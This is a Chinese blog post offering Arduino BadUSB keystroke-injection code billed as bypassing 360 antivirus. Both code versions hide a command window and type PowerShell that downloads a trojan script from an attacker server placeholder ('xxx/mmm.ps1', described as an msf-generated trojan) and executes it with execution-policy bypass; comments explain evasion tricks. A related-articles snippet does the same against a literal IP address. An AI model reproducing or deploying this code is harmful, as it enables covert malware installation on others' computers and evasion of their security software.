badusb示例代码可绕过360

最新推荐文章于 2022-08-17 11:55:33 发布
最新推荐文章于 2022-08-17 11:55:33 发布
阅读量3.2k 收藏 24
点赞数 2
文章标签: badusb
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37964989/article/details/102580623
版权

绕过360版本代码:

void setup() {
  // putpower shell your setup code here, to run once
  Keyboard.begin();//开始键盘通讯 
delay(3000);//延时 
Keyboard.press(KEY_LEFT_GUI);//win键 
delay(500);
Keyboard.press('r');//r键
delay(500); 
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r'); 
Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1\"");   //使用最小化隐藏cmd窗口
//cmd /c start /minCMD /C START /MIN POWERSHELL -W HIDDEN
delay(500);
Keyboard.press(KEY_RETURN); 
Keyboard.release(KEY_RETURN); 
delay(2000);
Keyboard.println("powershell");
Keyboard.println("$clnt = new-object System.Net.WebClient;");
Keyboard.println("$url= 'http://xxx/mmm.ps1';");  //xxx为你服务器ip,mmm为生成的木马文件
Keyboard.println("$file = ' D:\\mmm.ps1';");      //下载到目标存放文件的地址
Keyboard.println("$clnt.DownloadFile($url,$file)");  //才用分段执行绕过防火墙进程防护
Keyboard.println("PowerShell.exe -ExecutionPolicy Bypass -File d:\\mmm.ps1"); //本地权限绕过执行木马脚本
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK); 
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯 
}

void loop() {
  // put your main code here, to run repeatedly:

}

简单使用版本代码:(360进程防护会阻拦)


Keyboard.begin();//开始键盘通讯 
delay(5000);//延时 
Keyboard.press(KEY_LEFT_GUI);//win键 
delay(500);
Keyboard.press('r');//r键
delay(500); 
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r'); 
Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("CMD");
delay(500);
Keyboard.press(KEY_RETURN); 
Keyboard.release(KEY_RETURN); 
delay(2000);
Keyboard.println("powershell -windowstyle hidden -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://xxx/mmm.ps1');mmm.ps1");  //xxx为你服务器ip,mmm为msf生成的木马文件,此代码采用iex执行,不在本机执行。
Keyboard.press(KEY_RETURN); 
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK); 
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯

 

OKAY_TC
关注
  • 2
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Qt开发经验总结
草上爬的博客
12-02 8072
增加了很多轮子,同时原有模块拆分的也更细致,估计为了方便拓展个管理。把一些过度封装的东西移除了(比如同样的功能有多个函数),保证了只有一个函数执行该功能。把一些Qt5中兼容Qt4的方法废弃了,必须用Qt5中对应的新的函数。跟随时代脚步,增加了不少新特性以满足日益增长的客户需求。对某些模块和类型及处理进行了革命性的重写,运行效率提高不少。有参数类型的变化,比如 long * 到 qintptr * 等,更加适应后续的拓展以及同时对32 64位不同系统的兼容。
x264 代码重点详解 详细分析
热门推荐
nmwhqjl的专栏
09-12 2万+
eg mplayer x264 代码重点详解 详细分析 分类: ffmpeg 2012-02-06 09:19 4229人阅读 评论(1) 收藏 举报 h.264codecflv优化initializationinteger 目录(?)[+] ffmpeg和mplayer中求平均值得方法 1 ordinary c language level #def
基于ArduinoLeonardo板子的BadUSB攻击实战
weixin_34376562的博客
04-11 595
0X00 前言 在Freebuf上许多同学已经对HID攻击谈了自己的看法,如维克斯同学的《利用Arduino快速制作Teensy BadUSB》无论从科普还是实践都给我们详尽的描述了BadUSB制作的相关过程,lpcdma同学的《使用arduino进行渗透测试》则通过SET与Arduino的结合进行渗透,mrzcpo同学的 《HID高级攻击姿势:利用PowerShell脚本进行文件窃取》则介绍了获...
系统安全-BadUsb代码以及木马远控的制作(可绕过360
Coisini的博客
05-31 9198
漏洞背景 是今年计算机安全领域的热门话题之一,该漏洞由Karsten Nohl和Jakob Lell共同发现,并在今年的BlackHat安全大会上公布。BadUsb号称是世界上最邪恶的USB外设。笔者使用他们的代码做了个类似的U盘,用户插入U盘,就会自动执行预置在固件中的恶意代码,下载服务器上恶意文件,执行恶意操作…. 硬件准备 这里我们使用的是: BS Micro pro micro leona...
360图书馆】插入U盘自动攻击:BadUSB原理与实现
weixin_30535913的博客
03-14 946
插入U盘自动攻击:BadUSB原理与实现 漏洞背景 “BadUSB”是今年计算机安全领域的热门话题之一,该漏洞由Karsten Nohl和Jakob Lell共同发现,并在今年的BlackHat安全大会上公布。BadUSB号称是世界上最邪恶的USB外设。 笔者使用他们的代码做了个类似的U盘,用户插入U盘,就会自动执行预置在固件中的恶...
BadUSB利用以及免杀(测试bypass某数字卫士)
r250414958的博客
03-03 1098
文章写了有一段时间了,本来打算投稿某网站的,但发现太菜了,索性算了 系统:windows_7_64_专业版 工具:cobalt strike3.14、Teensy++2.0 关于利用方面 我首先就想到了powershell,但是网上的免杀方法已经被杀得七七八八了 但是天无绝人之路,再继续搜索下看到了白色键盘师傅的文章,经过测试可绕过文章发布最新的某数字卫士上线 https://www.temp33.com/bypass%E7%B3%BB%E5%88%97-%E7%BB%95%E8%BF%87360%E6%
badusb代码.zip
07-25
分享一款badusb代码,测试过还是可以正常使用。希望帮到有需要的小伙伴。
写程序启动项时如何过卡巴与360安全卫士等软件的方法
荣植华的专栏
10-09 4561
procedure SetPrivilege;const  ADJUST_PRIV = TOKEN_QUERY or TOKEN_ADJUST_PRIVILEGES;  SHTDWN_PRIV = SeBackupPrivilege;      //SeBackupPrivilege 备份文件和目录。      //允许用户绕过文件和目录的权限来做备份。只有当应用程序尝试访问NTFS备份API
BadUSB制作教程_BadUSB简单示例(初学)_程序编写工具
Jason Xu 的博客
04-10 5969
说明 本文章仅供学习交流,请勿用于非法用途 我用的是CJMCU-Beetle arduino Leonardo USB ATMEGA32U4 Mini Size Development Board 官网购买地址https://www.thanksbuyer.com/cjmcu-beetle-arduino-leonardo-usb-atmega32u4-mini-size-development-board-35975 软件-Arduino Kali下自带 Windows下 官网下载地址 https://
badusb详细制作教程(两种方式实现远控)
Ghost_system的博客
08-17 1万+
badusb是一种几乎可以突破任何杀毒软件和防火墙的设备,堪称渗透测试利器 文章目录前言一、什么是badusb?二,badusb的优点三,badusb是如何攻击的?badusb原理HID攻击漏洞产生原因三、准备步骤1.设备2,编辑器的安装与设置四,编写代码(重点)第一种: SEToolkit + badusb实现PowerShell注入攻击第二种:Cobalt Strike + badusb 实现PowerShell注入攻击五,烧录六,badusb有多强大攻击场景总结 BadUSB是《黑客军团》中
BADUSB代码及服务器地址.txt
07-21
BADUSB代码及服务器地址,主要用于arduino配置及BADUSB制作
badusb_badusb_
09-29
badusb资料,需要自行打包带走
Badusb下载源码
09-24
Badusb下载源码void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("POWERSHELL -NOP -W HIDDEN -C sET-eXECUTIONpOLICY UNRESTRICTED -FORCE;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE('HTTP://182.16.98.84/1.TXT', 'D:1.TXT');START D:1.TXT;EXIT"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop()//循环 { }
badusb代码daquan.zip
06-22
badusb代码daquan.zip
免杀360过主动防御加入白名单代码放出
08-04
免杀过掉360主动防御加入白名单代码放出 仍痛割爱的放出来 象征性的收些分吧 希望大家珍惜
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5496
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
badusb代码_badusb攻击代码
weixin_39887183的博客
11-28 2467
badusb攻击(msfconsole)准备badusbArduino下载软件点击下载运行软件在工具菜单中 选择,选择badusb的端口和开发版。注入代码windows10系统#includevoidsetup(){Keyboard.begin();//开始键盘通讯delay(1000);//延时Keyboard.press(KEY_LEFT_GUI);//win键delay(50...
badusb代码_携Badusb进校园的系列测试
weixin_39722965的博客
11-27 145
原创 Scan 合天智汇本文所用到的工具:BadusbNgrokArduinoMsfconsoleMsfvenom迷你相机0x01蓄谋已久的前言 每次上楼时,都能看见广播室门开得非常宽但这不是重点,重点是里面的电脑(WindowsXP),电脑桌面上是LED大屏幕的编辑软件。二楼有个网络管理箱并由管道内的网线传输到每个教室的多媒体(Windows10)。看看兜里的Badusb,突然就散发出了浓浓的香...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值